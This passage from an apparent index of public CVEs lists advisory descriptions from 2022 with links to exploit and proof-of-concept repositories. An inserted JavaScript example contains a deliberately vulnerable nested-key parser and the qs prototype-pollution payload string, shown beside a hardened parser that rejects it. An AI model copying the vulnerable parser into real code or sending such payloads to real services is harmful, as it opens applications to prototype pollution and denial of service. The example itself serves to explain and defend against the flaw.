Baicells Nova436Q and Neutrino 430 devices with firmware through QRTB 2.7.8 have hardcoded credentials that are easily discovered, and can be used by remote attackers to authenticate via ssh. (The credentials are stored in the firmware, encrypted by the crypt function.)

- [lukejenkins/CVE-2022-24693](https://github.com/lukejenkins/CVE-2022-24693)

### CVE-2022-24702 (2022-05-31)

An issue was discovered in WinAPRS 2.9.0. A buffer overflow in the VHF KISS TNC component allows a remote attacker to achieve remote code execution via malicious AX.25 packets over the air. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

- [Coalfire-Research/WinAPRS-Exploits](https://github.com/Coalfire-Research/WinAPRS-Exploits)

### CVE-2022-24706 (2022-04-26)

In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. The CouchDB documentation has always made recommendations for properly securing an installation, including recommending using a firewall in front of all CouchDB installations.

- [sadshade/CVE-2022-24706-CouchDB-Exploit](https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit)
- [ahmetsabrimert/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-](https://github.com/ahmetsabrimert/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-)
- [superzerosec/CVE-2022-24706](https://github.com/superzerosec/CVE-2022-24706)

### CVE-2022-24707 (2022-02-23)

Anuko Time Tracker is an open source, web-based time tracking application written in PHP. UNION SQL injection and time-based blind injection vulnerabilities existed in the Time Tracker Puncher plugin in versions of anuko timetracker prior to 1.20.0.5642. This was happening because the Puncher plugin was reusing code from other places and was relying on an unsanitized date parameter in POST requests. Because the parameter was not checked, it was possible to craft POST requests with malicious SQL for the Time Tracker database. This issue has been resolved in version 1.20.0.5642. Users unable to upgrade are advised to add their own checks to input.

- [Altelus1/CVE-2022-24707](https://github.com/Altelus1/CVE-2022-24707)

### CVE-2022-24713 (2022-03-08)

regex is an implementation of regular expressions for the Rust language. The regex crate features built-in mitigations to prevent denial of service attacks caused by untrusted regexes, or untrusted input matched by trusted regexes. Those (tunable) mitigations already provide sane defaults to prevent attacks. This guarantee is documented and it's considered part of the crate's API. Unfortunately a bug was discovered in the mitigations designed to prevent untrusted regexes from taking an arbitrary amount of time during parsing, and it's possible to craft regexes that bypass such mitigations. This makes it possible to perform denial of service attacks by sending specially crafted regexes to services accepting user-controlled, untrusted regexes. All versions of the regex crate up to and including 1.5.4 are affected by this issue. The fix is included starting from regex 1.5.5. All users accepting user-controlled regexes are recommended to upgrade immediately to the latest version of the regex crate. Unfortunately there is no fixed set of problematic regexes, as there are practically infinite regexes that could be crafted to exploit this vulnerability. Because of this, it is not recommended to deny known problematic regexes.

- [ItzSwirlz/CVE-2022-24713-POC](https://github.com/ItzSwirlz/CVE-2022-24713-POC)

### CVE-2022-24715 (2022-03-08)

Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Authenticated users, with access to the configuration, can create SSH resource files in unintended directories, leading to the execution of arbitrary code. This issue has been resolved in versions 2.8.6, 2.9.6 and 2.10 of Icinga Web 2. Users unable to upgrade should limit access to the Icinga Web 2 configuration.

- [JacobEbben/CVE-2022-24715](https://github.com/JacobEbben/CVE-2022-24715)
- [cxdxnt/CVE-2022-24715](https://github.com/cxdxnt/CVE-2022-24715)
- [d4rkb0n3/CVE-2022-24715-go](https://github.com/d4rkb0n3/CVE-2022-24715-go)

### CVE-2022-24716 (2022-03-08)

Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.

- [JacobEbben/CVE-2022-24716](https://github.com/JacobEbben/CVE-2022-24716)
- [joaoviictorti/CVE-2022-24716](https://github.com/joaoviictorti/CVE-2022-24716)
- [pumpkinpiteam/CVE-2022-24716](https://github.com/pumpkinpiteam/CVE-2022-24716)
- [doosec101/CVE-2022-24716](https://github.com/doosec101/CVE-2022-24716)
- [antisecc/CVE-2022-24716](https://github.com/antisecc/CVE-2022-24716)

### CVE-2022-24734 (2022-03-09)

MyBB is a free and open source forum software. In affected versions the Admin CP's Settings management module does not validate setting types correctly on insertion and update, making it possible to add settings of supported type `php` with PHP code, executed on _Change Settings_ pages. This results in a Remote Code Execution (RCE) vulnerability. The vulnerable module requires Admin CP access with the `Can manage settings?` permission. MyBB's Settings module, which allows administrators to add, edit, and delete non-default settings, stores setting data in an options code string ($options_code; mybb_settings.optionscode database column) that identifies the setting type and its options, separated by a new line character (\n). In MyBB 1.2.0, support for setting type php was added, for which the remaining part of the options code is PHP code executed on Change Settings pages (reserved for plugins and internal use). MyBB 1.8.30 resolves this issue. There are no known workarounds.

- [Altelus1/CVE-2022-24734](https://github.com/Altelus1/CVE-2022-24734)
- [lavclash75/mybb-CVE-2022-24734](https://github.com/lavclash75/mybb-CVE-2022-24734)

### CVE-2022-24760 (2022-03-11)

Parse Server is an open source http web server backend. In versions prior to 4.10.7 there is a Remote Code Execution (RCE) vulnerability in Parse Server. This vulnerability affects Parse Server in the default configuration with MongoDB. The main weakness that leads to RCE is the Prototype Pollution vulnerable code in the file `DatabaseController.js`, so it is likely to affect Postgres and any other database backend as well. This vulnerability has been confirmed on Linux (Ubuntu) and Windows. Users are advised to upgrade as soon as possible. The only known workaround is to manually patch your installation with code referenced at the source GHSA-p6h4-93qp-jhcm.

- [tuo4n8/CVE-2022-24760](https://github.com/tuo4n8/CVE-2022-24760)

### CVE-2022-24780 (2022-04-05)

Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific http queries, and execute arbitrary code on the server using http server user privileges. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.

- [Acceis/exploit-CVE-2022-24780](https://github.com/Acceis/exploit-CVE-2022-24780)

### CVE-2022-24818 (2022-04-13)

GeoTools is an open source Java library that provides tools for geospatial data. The GeoTools library has a number of data sources that can perform unchecked JNDI lookups, which in turn can be used to perform class deserialization and result in arbitrary code execution. Similar to the Log4J case, the vulnerability can be triggered if the JNDI names are user-provided, but requires admin-level login to be triggered. The lookups are now restricted in GeoTools 26.4, GeoTools 25.6, and GeoTools 24.6. Users unable to upgrade should ensure that any downstream application should not allow usage of remotely provided JNDI strings.

- [mbadanoiu/CVE-2022-24818](https://github.com/mbadanoiu/CVE-2022-24818)

### CVE-2022-24834 (2023-07-13)

Redis is an in-memory database that persists on disk. A specially crafted Lua script executing in Redis can trigger a heap overflow in the cjson library, and result in heap corruption and potentially remote code execution. The problem exists in all versions of Redis with Lua scripting support, starting from 2.6, and affects only authenticated and authorized users. The problem is fixed in versions 7.0.12, 6.2.13, and 6.0.20.

- [convisolabs/CVE-2022-24834](https://github.com/convisolabs/CVE-2022-24834)
- [DukeSec97/CVE-2022-24834-](https://github.com/DukeSec97/CVE-2022-24834-)

### CVE-2022-24853 (2022-04-14)

Metabase is an open source business intelligence and analytics application. Metabase has a proxy to load arbitrary URLs for JSON maps as part of our GeoJSON support. While we do validation to not return contents of arbitrary URLs, there is a case where a particularly crafted request could result in file access on windows, which allows enabling an `NTLM relay attack`, potentially allowing an attacker to receive the system password hash. If you use Windows and are on this version of Metabase, please upgrade immediately. The following patches (or greater versions) are available: 0.42.4 and 1.42.4, 0.41.7 and 1.41.7, 0.40.8 and 1.40.8.

- [secure-77/CVE-2022-24853](https://github.com/secure-77/CVE-2022-24853)

### CVE-2022-24924 (2022-02-11)

An improper access control in LiveWallpaperService prior to version 3.0.9.0 allows creating a specifically named system directory without a proper permission.

- [heegong/CVE-2022-24924](https://github.com/heegong/CVE-2022-24924)

### CVE-2022-24934 (2022-03-23)

wpsupdater.exe in Kingsoft WPS Office through 11.2.0.10382 allows remote code execution by modifying HKEY_CURRENT_USER in the registry.

- [nanaao/CVE-2022-24934](https://github.com/nanaao/CVE-2022-24934)
- [ASkyeye/WPS-CVE-2022-24934](https://github.com/ASkyeye/WPS-CVE-2022-24934)
- [webraybtl/CVE-2022-24934](https://github.com/webraybtl/CVE-2022-24934)
- [MagicPiperSec/WPS-CVE-2022-24934](https://github.com/MagicPiperSec/WPS-CVE-2022-24934)

### CVE-2022-24990 (2023-02-07)

TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to module/api.php?mobile/webNasIPS and then reading the PWD field in the response.

- [Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-](https://github.com/Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP-)
- [VVeakee/CVE-2022-24990-POC](https://github.com/VVeakee/CVE-2022-24990-POC)
- [0xf4n9x/CVE-2022-24990](https://github.com/0xf4n9x/CVE-2022-24990)
- [lishang520/CVE-2022-24990](https://github.com/lishang520/CVE-2022-24990)
- [ZZ-SOCMAP/CVE-2022-24990](https://github.com/ZZ-SOCMAP/CVE-2022-24990)
- [jsongmax/terraMaster-CVE-2022-24990](https://github.com/jsongmax/terraMaster-CVE-2022-24990)

### CVE-2022-24992 (2022-07-25)

A vulnerability in the component process.php of QR Code Generator v5.2.7 allows attackers to perform directory traversal.

- [n0lsecurity/CVE-2022-24992](https://github.com/n0lsecurity/CVE-2022-24992)

### CVE-2022-24999 (2022-11-26)

qs before 6.10.3, as used in Express before 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because an `__proto__` key can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as `a[__proto__]=b&a[__proto__]&a[length]=100000000`. The fix was backported to qs 6.9.7, 6.8.3, 6.7.3, 6.6.1, 6.5.3, 6.4.1, 6.3.3, and 6.2.4 (and therefore Express 4.17.3, which has "deps: qs@6.9.7" in its release description, is not vulnerable).

- [n8tz/CVE-2022-24999](https://github.com/n8tz/CVE-2022-24999)
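Both CVE-2022-24760 (Parse Server, prototype pollution in `DatabaseController.js`) and CVE-2022-24999 (qs) come down to user-controlled key names reaching `Object.prototype` through nested assignment. The example below is added here to show the bug class next to one hardening; it is not code from qs, Parse Server or Express. `naiveParseQuery` reproduces the prototype-pollution write, and `safeParseQuery` uses null-prototype containers, drops `__proto__`, `constructor` and `prototype` key segments and bounds nesting depth and pair count. The hang in qs comes from how it materialises arrays from an attacker-supplied `length`, which this minimal parser does not reproduce; the advisory's payload is only shown being rejected.

```javascript
"use strict";

// Key segments that let user input reach Object.prototype (or a constructor) when a
// parser assigns nested keys without checking them.
const FORBIDDEN_SEGMENTS = new Set(["__proto__", "constructor", "prototype"]);
const MAX_DEPTH = 5;    // limit on a[b][c]... nesting
const MAX_PAIRS = 1000; // limit on the number of key=value pairs

// "a[b][c]" -> ["a", "b", "c"]; a bare key "a" -> ["a"]; unbalanced brackets -> null.
function splitKey(rawKey) {
  const m = /^([^\[\]]*)((?:\[[^\[\]]*\])*)$/.exec(rawKey);
  if (!m) return null;
  const parts = [m[1]];
  const re = /\[([^\[\]]*)\]/g;
  let seg;
  while ((seg = re.exec(m[2])) !== null) parts.push(seg[1]);
  return parts;
}

// Naive nested assignment, the pattern behind this bug class: walking into
// node["__proto__"] lands on Object.prototype, so the final write pollutes every object.
function naiveParseQuery(query) {
  const out = {};
  for (const [rawKey, value] of new URLSearchParams(query)) {
    const parts = splitKey(rawKey) || [rawKey];
    let node = out;
    for (let i = 0; i < parts.length - 1; i++) {
      if (typeof node[parts[i]] !== "object" || node[parts[i]] === null) node[parts[i]] = {};
      node = node[parts[i]];
    }
    node[parts[parts.length - 1]] = value;
  }
  return out;
}

// Hardened version: null-prototype containers, forbidden or malformed keys dropped
// and reported, bounded depth and pair count.
function safeParseQuery(query) {
  const params = Object.create(null);
  const rejected = [];
  let pairs = 0;
  for (const [rawKey, value] of new URLSearchParams(query)) {
    if (++pairs > MAX_PAIRS) throw new Error("too many parameters");
    const parts = splitKey(rawKey);
    if (parts === null || parts.length > MAX_DEPTH || parts.some((p) => FORBIDDEN_SEGMENTS.has(p))) {
      rejected.push(rawKey);
      continue;
    }
    let node = params;
    for (let i = 0; i < parts.length - 1; i++) {
      const p = parts[i];
      if (typeof node[p] !== "object" || node[p] === null) node[p] = Object.create(null);
      node = node[p];
    }
    node[parts[parts.length - 1]] = value;
  }
  return { params, rejected };
}

// The payload from the advisory: every __proto__ segment is dropped, and "length"
// becomes an ordinary string-valued key on a null-prototype object.
console.log(safeParseQuery("a[__proto__]=b&a[__proto__]&a[length]=100000000"));
```

Dropping the key (rather than failing the whole request) keeps the parser usable behind existing routes; a stricter deployment can turn `rejected.length > 0` into a 400 response.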

### CVE-2022-25012 (2022-03-01)

Argus Surveillance DVR v4.0 employs weak password encryption.

- [s3l33/CVE-2022-25012](https://github.com/s3l33/CVE-2022-25012)

### CVE-2022-25018 (2022-03-01)

Pluxml v5.8.7 was discovered to allow attackers to execute arbitrary code via crafted PHP code inserted into static pages.

- [MoritzHuppert/CVE-2022-25018](https://github.com/MoritzHuppert/CVE-2022-25018)

### CVE-2022-25020 (2022-03-01)

A cross-site scripting (XSS) vulnerability in Pluxml v5.8.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the thumbnail path of a blog post.

- [MoritzHuppert/CVE-2022-25020](https://github.com/MoritzHuppert/CVE-2022-25020)

### CVE-2022-25022 (2022-03-01)

A cross-site scripting (XSS) vulnerability in Htmly v2.8.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the content field of a blog post.

- [MoritzHuppert/CVE-2022-25022](https://github.com/MoritzHuppert/CVE-2022-25022)

### CVE-2022-25060 (2022-02-25)

TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a command injection vulnerability via the component oal_startPing.

- [exploitwritter/CVE-2022-25060](https://github.com/exploitwritter/CVE-2022-25060)

### CVE-2022-25061 (2022-02-25)

TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a command injection vulnerability via the component oal_setIp6DefaultRoute.

- [exploitwritter/CVE-2022-25061](https://github.com/exploitwritter/CVE-2022-25061)

### CVE-2022-25062 (2022-02-25)

TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain an integer overflow via the function dm_checkString. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request.

- [exploitwritter/CVE-2022-25062](https://github.com/exploitwritter/CVE-2022-25062)

### CVE-2022-25063
- [exploitwritter/CVE-2022-25063](https://github.com/exploitwritter/CVE-2022-25063)

### CVE-2022-25064 (2022-02-25)

TP-LINK TL-WR840N(ES)_V6.20_180709 was discovered to contain a remote code execution (RCE) vulnerability via the function oal_wan6_setIpAddr.

- [exploitwritter/CVE-2022-25064](https://github.com/exploitwritter/CVE-2022-25064)
- [Mr-xn/CVE-2022-25064](https://github.com/Mr-xn/CVE-2022-25064)

### CVE-2022-25089 (2022-03-02)

Printix Secure Cloud Print Management through 1.3.1106.0 incorrectly uses Privileged APIs to modify values in HKEY_LOCAL_MACHINE via UITasks.PersistentRegistryData.

- [ComparedArray/printix-CVE-2022-25089](https://github.com/ComparedArray/printix-CVE-2022-25089)

### CVE-2022-25090 (2022-03-09)

Printix Secure Cloud Print Management through 1.3.1106.0 creates a temporary temp.ini file in a directory with insecure permissions, leading to privilege escalation because of a race condition.

- [ComparedArray/printix-CVE-2022-25090](https://github.com/ComparedArray/printix-CVE-2022-25090)

### CVE-2022-25235 (2022-02-16)

xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain validation of encoding, such as checks for whether a UTF-8 character is valid in a certain context.

- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25235](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25235)

### CVE-2022-25236 (2022-02-16)

xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters into namespace URIs.

- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25236](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25236)

### CVE-2022-25256 (2022-02-19)

SAS Web Report Studio 4.4 allows XSS. /SASWebReportStudio/logonAndRender.do has two parameters: saspfs_request_backlabel_list and saspfs_request_backurl_list. The first one affects the content of the button placed in the top left. The second affects the page to which the user is directed after pressing the button, e.g., a malicious web page. In addition, the second parameter executes JavaScript, which means XSS is possible by adding a javascript: URL.

- [RobertDra/CVE-2022-25256](https://github.com/RobertDra/CVE-2022-25256)

### CVE-2022-25257
- [polling-repo-continua/CVE-2022-25257](https://github.com/polling-repo-continua/CVE-2022-25257)
- [RobertDra/CVE-2022-25257](https://github.com/RobertDra/CVE-2022-25257)

### CVE-2022-25258 (2022-02-16)

An issue was discovered in drivers/usb/gadget/composite.c in the Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur.

- [szymonh/d-os-descriptor](https://github.com/szymonh/d-os-descriptor)

### CVE-2022-25260 (2022-02-25)

JetBrains Hub before 2021.1.14276 was vulnerable to blind Server-Side Request Forgery (SSRF).

- [yuriisanin/CVE-2022-25260](https://github.com/yuriisanin/CVE-2022-25260)

### CVE-2022-25262 (2022-02-25)

In JetBrains Hub before 2022.1.14434, SAML request takeover was possible.

- [yuriisanin/CVE-2022-25262](https://github.com/yuriisanin/CVE-2022-25262)

### CVE-2022-25265 (2022-02-16)

In the Linux kernel through 5.16.10, certain binary files may have the exec-all attribute if they were built in approximately 2003 (e.g., with GCC 3.2.2 and Linux kernel 2.4.20). This can cause execution of bytes located in supposedly non-executable regions of a file.

- [x0reaxeax/exec-prot-bypass](https://github.com/x0reaxeax/exec-prot-bypass)

### CVE-2022-25313 (2022-02-18)

In Expat (aka libexpat) before 2.4.5, an attacker can trigger stack exhaustion in build_model via a large nesting depth in the DTD element.

- [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313)
- [Trinadh465/external_expat-2.1.0_CVE-2022-25313](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-25313)

### CVE-2022-25314 (2022-02-18)

In Expat (aka libexpat) before 2.4.5, there is an integer overflow in copyString.

- [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25314](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25314)

### CVE-2022-25315 (2022-02-18)

In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames.

- [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315)
- [hshivhare67/external_expat_v2.1.0_CVE-2022-25315](https://github.com/hshivhare67/external_expat_v2.1.0_CVE-2022-25315)

### CVE-2022-25365 (2022-02-19)

Docker Desktop before 4.5.1 on Windows allows attackers to move arbitrary files. NOTE: this issue exists because of an incomplete fix for CVE-2022-23774.

- [followboy1999/CVE-2022-25365](https://github.com/followboy1999/CVE-2022-25365)

### CVE-2022-25375 (2022-02-20)

An issue was discovered in drivers/usb/gadget/function/rndis.c in the Linux kernel before 5.16.10. The RNDIS USB gadget lacks validation of the size of the RNDIS_MSG_SET command. Attackers can obtain sensitive information from kernel memory.

- [szymonh/rndis-co](https://github.com/szymonh/rndis-co)

### CVE-2022-25479 (2024-07-02)

Vulnerability in Realtek RtsPer driver for PCIe Card Reader (RtsPer.sys) before 10.0.22000.21355 and Realtek RtsUer driver for USB Card Reader (RtsUer.sys) before 10.0.22000.31274 allows for the leakage of kernel memory from both the stack and the heap.

- [SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN](https://github.com/SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN)

### CVE-2022-25636 (2022-02-22)

net/netfilter/nf_dup_netdev.c in the Linux kernel 5.4 through 5.6.10 allows local users to gain privileges because of a heap out-of-bounds write. This is related to nf_tables_offload.

- [Bonfee/CVE-2022-25636](https://github.com/Bonfee/CVE-2022-25636)
- [chenaotian/CVE-2022-25636](https://github.com/chenaotian/CVE-2022-25636)
- [veritas501/CVE-2022-25636-PipeVersion](https://github.com/veritas501/CVE-2022-25636-PipeVersion)

### CVE-2022-25640 (2022-02-24)

In wolfSSL before 5.2.0, a TLS 1.3 server cannot properly enforce a requirement for mutual authentication. A client can simply omit the certificate_verify message from the handshake, and never present a certificate.

- [dim0x69/cve-2022-25640-exploit](https://github.com/dim0x69/cve-2022-25640-exploit)

### CVE-2022-25765 (2022-09-09)

All versions of the package pdfkit (from 0.0.0) are vulnerable to command injection because the URL is not properly sanitized before it is passed to the underlying command.

- [PurpleWaveIO/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell](https://github.com/PurpleWaveIO/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell)
- [Wai-Yan-Kyaw/PDFKitExploit](https://github.com/Wai-Yan-Kyaw/PDFKitExploit)
- [LordRNA/CVE-2022-25765](https://github.com/LordRNA/CVE-2022-25765)
- [shamo0/PDFkit-CMD-Injection](https://github.com/shamo0/PDFkit-CMD-Injection)
- [nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765](https://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765)
- [UNICORDev/exploit-CVE-2022-25765](https://github.com/UNICORDev/exploit-CVE-2022-25765)
- [lekosbelas/PDFkit-CMD-Injection](https://github.com/lekosbelas/PDFkit-CMD-Injection)
- [lowercasenumbers/CVE-2022-25765](https://github.com/lowercasenumbers/CVE-2022-25765)

### CVE-2022-25813 (2022-09-02)

In Apache OFBiz, versions 18.12.05 and earlier, an attacker acting as an anonymous user of the ecommerce plugin can insert malicious content into the “Subject” field of a message from the "Contact us" page. When a party manager then lists the communications in the party component, the SSTI is triggered, and RCE is then possible.

- [mbadanoiu/CVE-2022-25813](https://github.com/mbadanoiu/CVE-2022-25813)

### CVE-2022-25845 (2022-06-10)

The package com.alibaba:fastjson before 1.2.83 is vulnerable to Deserialization of Untrusted Data by bypassing the default autoType shutdown restrictions, which is possible under certain conditions. Exploiting this vulnerability allows attacking remote servers. Workaround: if upgrading is not possible, enable [safeMode](https://github.com/alibaba/fastjson/wiki/fastjson_safemode).

- [hosch3n/FastjsonVulns](https://github.com/hosch3n/FastjsonVulns)
- [nerowander/CVE-2022-25845-exploit](https://github.com/nerowander/CVE-2022-25845-exploit)
- [scabench/fastjson-tp1fn1](https://github.com/scabench/fastjson-tp1fn1)

### CVE-2022-25927 (2023-01-25)

Versions of the package ua-parser-js from 0.7.30 and before 0.7.33, from 0.8.1 and before 1.0.33 are vulnerable to Regular Expression Denial of Service (ReDoS) via the trim() function.

- [masahiro331/cve-2022-25927](https://github.com/masahiro331/cve-2022-25927)

### CVE-2022-25943 (2022-03-09)

The installer of WPS Office for Windows versions prior to v11.2.0.10258 fails to properly configure the ACL for the directory where the service program is installed.

- [HadiMed/KINGSOFT-WPS-Office-LPE](https://github.com/HadiMed/KINGSOFT-WPS-Office-LPE)
- [webraybtl/CVE-2022-25943](https://github.com/webraybtl/CVE-2022-25943)

### CVE-2022-25949 (2022-03-17)

The kernel mode driver kwatch3 of KINGSOFT Internet Security 9 Plus Version 2010.06.23.247 fails to properly handle crafted inputs, leading to stack-based buffer overflow.

- [tandasat/CVE-2022-25949](https://github.com/tandasat/CVE-2022-25949)

### CVE-2022-26133 (2022-04-20)

SharedSecretClusterAuthenticator in Atlassian Bitbucket Data Center versions 5.14.0 and later before 7.6.14, 7.7.0 and later prior to 7.17.6, 7.18.0 and later prior to 7.18.4, 7.19.0 and later prior to 7.19.4, and 7.20.0 allow a remote, unauthenticated attacker to execute arbitrary code via Java deserialization.

- [Pear1y/CVE-2022-26133](https://github.com/Pear1y/CVE-2022-26133)
- [0xAbbarhSF/CVE-2022-26133](https://github.com/0xAbbarhSF/CVE-2022-26133)

### CVE-2022-26134 (2022-06-03)

In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.

- [W01fh4cker/Serein](https://github.com/W01fh4cker/Serein)
- [offlinehoster/CVE-2022-26134](https://github.com/offlinehoster/CVE-2022-26134)
- [ma1am/CVE-2022-26134-Exploit-Detection](https://github.com/ma1am/CVE-2022-26134-Exploit-Detection)
- [jbaines-r7/through_the_wire](https://github.com/jbaines-r7/through_the_wire)
- [crowsec-edtech/CVE-2022-26134](https://github.com/crowsec-edtech/CVE-2022-26134)
- [kyxiaxiang/CVE-2022-26134](https://github.com/kyxiaxiang/CVE-2022-26134)
- [Brucetg/CVE-2022-26134](https://github.com/Brucetg/CVE-2022-26134)
- [shamo0/CVE-2022-26134](https://github.com/shamo0/CVE-2022-26134)
- [SNCKER/CVE-2022-26134](https://github.com/SNCKER/CVE-2022-26134)
- [Sakura-nee/CVE-2022-26134](https://github.com/Sakura-nee/CVE-2022-26134)
- [Vulnmachines/Confluence-CVE-2022-26134](https://github.com/Vulnmachines/Confluence-CVE-2022-26134)
- [axingde/CVE-2022-26134](https://github.com/axingde/CVE-2022-26134)
- [0xAgun/CVE-2022-26134](https://github.com/0xAgun/CVE-2022-26134)
- [abhishekmorla/CVE-2022-26134](https://github.com/abhishekmorla/CVE-2022-26134)
- [hev0x/CVE-2022-26134](https://github.com/hev0x/CVE-2022-26134)
- [archanchoudhury/Confluence-CVE-2022-26134](https://github.com/archanchoudhury/Confluence-CVE-2022-26134)
- [SIFalcon/confluencePot](https://github.com/SIFalcon/confluencePot)
- [CatAnnaDev/CVE-2022-26134](https://github.com/CatAnnaDev/CVE-2022-26134)
- [vesperp/CVE-2022-26134-Confluence](https://github.com/vesperp/CVE-2022-26134-Confluence)
- [li8u99/CVE-2022-26134](https://github.com/li8u99/CVE-2022-26134)
- [reubensammut/cve-2022-26134](https://github.com/reubensammut/cve-2022-26134)
- [BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL](https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL)
- [alcaparra/CVE-2022-26134](https://github.com/alcaparra/CVE-2022-26134)
- [whokilleddb/CVE-2022-26134-Confluence-RCE](https://github.com/whokilleddb/CVE-2022-26134-Confluence-RCE)
- [Habib0x0/CVE-2022-26134](https://github.com/Habib0x0/CVE-2022-26134)
- [Y000o/Confluence-CVE-2022-26134](https://github.com/Y000o/Confluence-CVE-2022-26134)
- [redhuntlabs/ConfluentPwn](https://github.com/redhuntlabs/ConfluentPwn)
- [cai-niao98/CVE-2022-26134](https://github.com/cai-niao98/CVE-2022-26134)
- [sunny-kathuria/exploit_CVE-2022-26134](https://github.com/sunny-kathuria/exploit_CVE-2022-26134)
- [KeepWannabe/BotCon](https://github.com/KeepWannabe/BotCon)
- [Chocapikk/CVE-2022-26134](https://github.com/Chocapikk/CVE-2022-26134)
- [AmoloHT/CVE-2022-26134](https://github.com/AmoloHT/CVE-2022-26134)
- [kh4sh3i/CVE-2022-26134](https://github.com/kh4sh3i/CVE-2022-26134)
- [ColdFusionX/CVE-2022-26134](https://github.com/ColdFusionX/CVE-2022-26134)
- [Luchoane/CVE-2022-26134_conFLU](https://github.com/Luchoane/CVE-2022-26134_conFLU)
- [r1skkam/TryHackMe-Atlassian-CVE-2022-26134](https://github.com/r1skkam/TryHackMe-Atlassian-CVE-2022-26134)
- [nxtexploit/CVE-2022-26134](https://github.com/nxtexploit/CVE-2022-26134)
- [Debajyoti0-0/CVE-2022-26134](https://github.com/Debajyoti0-0/CVE-2022-26134)
- [f4yd4-s3c/cve-2022-26134](https://github.com/f4yd4-s3c/cve-2022-26134)
- [coskper-papa/CVE-2022-26134](https://github.com/coskper-papa/CVE-2022-26134)
- [p4b3l1t0/confusploit](https://github.com/p4b3l1t0/confusploit)
- [twoning/CVE-2022-26134-PoC](https://github.com/twoning/CVE-2022-26134-PoC)
- [iveresk/cve-2022-26134](https://github.com/iveresk/cve-2022-26134)
- [keven1z/CVE-2022-26134](https://github.com/keven1z/CVE-2022-26134)
- [shiftsansan/CVE-2022-26134-Console](https://github.com/shiftsansan/CVE-2022-26134-Console)
- [1337in/CVE-2022-26134web](https://github.com/1337in/CVE-2022-26134web)
- [skhalsa-sigsci/CVE-2022-26134-LAB](https://github.com/skhalsa-sigsci/CVE-2022-26134-LAB)
- [yigexioabai/CVE-2022-26134-cve1](https://github.com/yigexioabai/CVE-2022-26134-cve1)
- [kailing0220/CVE-2022-26134](https://github.com/kailing0220/CVE-2022-26134)
- [xanszZZ/ATLASSIAN-Confluence_rce](https://github.com/xanszZZ/ATLASSIAN-Confluence_rce)
- [kelemaoya/CVE-2022-26134](https://github.com/kelemaoya/CVE-2022-26134)
- [CJ-0107/cve-2022-26134](https://github.com/CJ-0107/cve-2022-26134)
- [latings/CVE-2022-26134](https://github.com/latings/CVE-2022-26134)
- [yyqxi/CVE-2022-26134](https://github.com/yyqxi/CVE-2022-26134)
- [b4dboy17/CVE-2022-26134](https://github.com/b4dboy17/CVE-2022-26134)
- [wjlin0/CVE-2022-26134](https://github.com/wjlin0/CVE-2022-26134)
- [cbk914/CVE-2022-26134_check](https://github.com/cbk914/CVE-2022-26134_check)
- [MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell](https://github.com/MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell)
- [Muhammad-Ali007/Atlassian_CVE-2022-26134](https://github.com/Muhammad-Ali007/Atlassian_CVE-2022-26134)
- [acfirthh/CVE-2022-26134](https://github.com/acfirthh/CVE-2022-26134)
- [yTxZx/CVE-2022-26134](https://github.com/yTxZx/CVE-2022-26134)
